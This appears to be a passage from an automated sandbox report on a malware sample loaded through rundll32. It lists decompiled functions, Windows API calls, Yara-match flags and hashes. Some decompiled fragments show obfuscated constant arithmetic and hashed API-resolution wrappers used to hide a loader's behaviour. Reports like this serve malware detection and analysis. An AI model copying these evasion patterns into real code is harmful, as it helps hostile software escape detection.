                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 91 1ae620-1ae66b call 1aea10 94 1ae67a-1ae6aa call 1ae390 VirtualAlloc 91->94 95 1ae66d-1ae677 call 1aea10 91->95 95->94
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001AE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_190000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 46f9e7db082cf1eab81d549f7dd1797f4dd924a28b6ede20e67842b76f6e4b9a
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 88113064D08289DAEF01D7E884097FEBFB55F21704F044098D5446B282D3BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 1836 Parent PID: 1068 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 002D3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 2d3928-2d39b4 call 2b79dc 477 2d39bd-2d39cf GetEnhMetaFileA 472->477 478 2d39b6 472->478 480 2d39d8-2d39ec 477->480 481 2d39d1 477->481 478->477 482 2d3a0e-2d3ac5 VirtualAlloc 480->482 483 2d39ee-2d3a0c 480->483 481->480 491 2d3acf-2d3ada 482->491 483->482 492 2d3adc-2d3b1f 491->492 493 2d3b21-2d3b33 491->493 492->491 494 2d3b75-2d3bac 493->494 495 2d3b35-2d3b73 493->495 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 002D39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,002D6CB4,00001000,00000040), ref: 002D3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l-
                                                                      • API String ID: 2643768156-3253273693
                                                                      • Opcode ID: 9e5f63f970632e6a57cb92e905cca0662c5950c10d68d11486579421ab3f341e
                                                                      • Instruction ID: 29ce4fffa8da071d9e9851645dea00885f54bde14d72846aca101f7ff736c839
                                                                      • Opcode Fuzzy Hash: 9e5f63f970632e6a57cb92e905cca0662c5950c10d68d11486579421ab3f341e
                                                                      • Instruction Fuzzy Hash: 27615774A276019FD750DF68FD8EB1937A2F708319B10802BE5898B2B1DB72AD64CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00279B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 523 279b5e-279c3f call 282550 call 277378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00279B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00282550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E00277378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}















                                                                      0x00279b66
                                                                      0x00279b69
                                                                      0x00279b6b
                                                                      0x00279b6e
                                                                      0x00279b71
                                                                      0x00279b73
                                                                      0x00279b78
                                                                      0x00279b87
                                                                      0x00279b8c
                                                                      0x00279b8d
                                                                      0x00279b90
                                                                      0x00279b91
                                                                      0x00279b9d
                                                                      0x00279b9e
                                                                      0x00279ba3
                                                                      0x00279baa
                                                                      0x00279bb8
                                                                      0x00279bbd
                                                                      0x00279bc4
                                                                      0x00279bcb
                                                                      0x00279bd5
                                                                      0x00279bdd
                                                                      0x00279be0
                                                                      0x00279be7
                                                                      0x00279bee
                                                                      0x00279c05
                                                                      0x00279c0c
                                                                      0x00279c0f
                                                                      0x00279c16
                                                                      0x00279c29
                                                                      0x00279c38
                                                                      0x00279c3f

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00279C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: f34977a1f11602f801fa9bea4a9aaadd354a1f709003b2203309028f15e96df3
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: EB214671D00209FBEB18CFA9C9469DEBBB5FB44310F50C099E814AA2A0D7B99B109F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0028C0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 528 28c0c8-28c191 call 282550 call 277378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0028C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00282550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E00277378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}











                                                                      0x0028c0d3
                                                                      0x0028c0d5
                                                                      0x0028c0d6
                                                                      0x0028c0d9
                                                                      0x0028c0db
                                                                      0x0028c0de
                                                                      0x0028c0df
                                                                      0x0028c0e2
                                                                      0x0028c0e5
                                                                      0x0028c0e8
                                                                      0x0028c0eb
                                                                      0x0028c0ee
                                                                      0x0028c0f1
                                                                      0x0028c0f2
                                                                      0x0028c0f3
                                                                      0x0028c0f8
                                                                      0x0028c102
                                                                      0x0028c106
                                                                      0x0028c10d
                                                                      0x0028c114
                                                                      0x0028c11b
                                                                      0x0028c122
                                                                      0x0028c129
                                                                      0x0028c130
                                                                      0x0028c134
                                                                      0x0028c13b
                                                                      0x0028c142
                                                                      0x0028c15d
                                                                      0x0028c160
                                                                      0x0028c174
                                                                      0x0028c189
                                                                      0x0028c191

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0028C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: f1d2c2496a8abf5de366d990810ea1e720fac661828c686f43b77baf11c7228c
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: B321C2B290020CBFEF019F95DD498DEBBB9EB55358F108198F92462250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002D1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 2d1638-2d1641 534 2d164b-2d16d1 DdeInitializeA call 2d1328 call 2d1a14 533->534 535 2d1643 533->535 545 2d16d6-2d16eb 534->545 535->534
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 002D1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: a6114f09be6208466b6ae1c6ca0d84103dfc33b8da3a532c325bb9b864e36fdc
                                                                      • Instruction ID: 392ad43e09aba904eff8a90b7d1e9e2f9833b04592e88d76c73af819aa0d3899
                                                                      • Opcode Fuzzy Hash: a6114f09be6208466b6ae1c6ca0d84103dfc33b8da3a532c325bb9b864e36fdc
                                                                      • Instruction Fuzzy Hash: 47119170620740ABD724FB759D82A4E77E8AF05700F909865F404D7B91EB35ED209B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001DEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 547 1deb40-1deb93 VirtualProtect 548 1deb95-1deba1 547->548 549 1deba6-1dec17 547->549 550 1dec3a-1dec85 call 1de7a0 call 1de7e0 548->550 549->550 567 1dec19-1dec37 549->567 557 1dec90-1dec9a 550->557 559 1dec9c-1deca3 557->559 560 1decf8-1ded4a call 1de920 557->560 561 1deced-1decf6 559->561 562 1deca5-1decac 559->562 570 1ded4c-1ded50 560->570 571 1ded78-1ded7f 560->571 561->557 562->561 565 1decae-1decea call 1de7e0 562->565 565->561 567->550 570->571 575 1ded52-1ded75 call 1de880 570->575 572 1ded8a-1ded94 571->572 576 1dede6-1dee1b call 1df000 572->576 577 1ded96-1ded9d 572->577 575->571 579 1ded9f-1deda6 577->579 580 1deddb-1dede4 577->580 579->580 583 1deda8-1dedd9 call 1dee20 VirtualProtect 579->583 580->572 583->580
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001DEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001DEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: b148d44ab56b61b2bca518033b4ef3e6d81f2716129a530a4a85c7b1bde80d7b
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 9EC1A875A002099FCB48DF88C590EAEB7B6BF88305F248159E9099F355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002D1A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 588 2d1a14-2d1a5a call 2d1ac8 594 2d1a5c-2d1a69 588->594 595 2d1a70-2d1aa7 DdeCreateStringHandleA DdeNameService 588->595 594->595 598 2d1aaf 595->598
                                                                      APIs
                                                                        • Part of subcall function 002D1AC8: DdeFreeStringHandle.USER32(?,?), ref: 002D1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 002D1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 002D1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 17f0deb4fff40ce72029f8f48b87418973fd1d00a70e56883b2af83c665bc0c7
                                                                      • Instruction ID: a7c54ac9b668464bd6b8d0f732e4c083216d88c815a653c0b1d02c549db9c21a
                                                                      • Opcode Fuzzy Hash: 17f0deb4fff40ce72029f8f48b87418973fd1d00a70e56883b2af83c665bc0c7
                                                                      • Instruction Fuzzy Hash: 49118B31731254AFCB11FEA4C882A4A37ADAF09B00B8045A2FC08DB747DB70ED20CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00277F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E00277F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00282550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00277378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x00277f52
                                                                      0x00277f55
                                                                      0x00277f57
                                                                      0x00277f5a
                                                                      0x00277f5e
                                                                      0x00277f5f
                                                                      0x00277f64
                                                                      0x00277f6b
                                                                      0x00277f72
                                                                      0x00277f79
                                                                      0x00277f94
                                                                      0x00277f97
                                                                      0x00277f9e
                                                                      0x00277fa5
                                                                      0x00277fac
                                                                      0x00277fb3
                                                                      0x00277fba
                                                                      0x00277fbe
                                                                      0x00277fc5
                                                                      0x00277fcc
                                                                      0x00277fd3
                                                                      0x00277fd7
                                                                      0x00277feb
                                                                      0x00277ff7
                                                                      0x00277ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00277FF7
                                                                      Strings
                                                                      Memory Dump Source
